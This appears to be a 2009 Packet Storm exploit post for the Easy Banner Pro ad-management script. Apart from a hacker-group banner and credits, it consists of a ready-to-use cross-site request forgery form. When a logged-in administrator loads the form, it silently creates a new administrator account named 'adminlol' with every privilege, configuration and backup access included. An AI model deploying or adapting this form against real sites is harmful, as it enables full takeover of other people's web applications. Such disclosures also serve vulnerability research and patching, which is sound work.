Easy Banner Pro Cross Site Request Forgery

2009-12-15T00:00:00
ID PACKETSTORM:83790
Type packetstorm
Reporter bi0
Modified 2009-12-15T00:00:00

Description

                                        
                                            ` ______ __ ______  
/\ == \ /\ \ /\ __ \  
\ \ __< \ \ \ \ \ \/\ \  
\ \_____\ \ \_\ \ \_____\  
\/_____/ \/_/ \/_____/  
  
01000010 01101001 01001111  
  
[#]----------------------------------------------------------------[#]  
#  
# [+] Easy Banner Pro - [ CSRF ] Create Administrator Account  
#  
# // Author Info  
# [x] Author: bi0  
# [x] Contact: bukibv@hotmail.com  
# [x] Homepage : www.ssteam.ws  
# [x] Thanks: sp1r1t,packetdeath,Zer0flag,redking and ssteam.ws ...  
#  
[#]-------------------------------------------------------------------------------------------[#]  
#  
# [x] Exploit :  
#  
# [ CSRF ]  
#  
# [ Login ]  
# http://localhost/[path]/administration/index.php  
#  
# // Start CSRF  
|-------------------------------------------------------------------------------|  
<form action="http://localhost/[path]/administration/admins.php" method="POST">  
<input type="hidden" name="action" value="admin_created">  
<input name="username" value="adminlol" maxlength=15>  
<input name="password" maxlength=15 value="adminlol">  
<input name="email" maxlength="255" value="test@demo.com">  
<input name="name" maxlength="255" value="adminlol">  
<input type="hidden" name="rights[]" value="advertisers" CHECKED>  
<input type="hidden" name="rights[]" value="packages" CHECKED>  
<input type="hidden" name="rights[]" value="publishers" CHECKED>  
<input type="hidden" name="rights[]" value="ads" CHECKED>  
<input type="hidden" name="rights[]" value="def_ads" CHECKED>  
<input type="hidden" name="rights[]" value="black_zones" CHECKED>  
<input type="hidden" name="rights[]" value="backup" CHECKED>  
<input type="hidden" name="rights[]" value="email_u" CHECKED>  
<input type="hidden" name="rights[]" value="reset" CHECKED>  
<input type="hidden" name="rights[]" value="tmpl_msg" CHECKED>  
<input type="hidden" name="rights[]" value="admins" CHECKED>  
<input type="hidden" name="rights[]" value="config" CHECKED>  
<input type="submit" name="submit" value="Submit">  
</form>  
|-------------------------------------------------------------------------------|  
# // End of attack  
#  
[#]------------------------------------------------------------------------------------------[#]  
  
`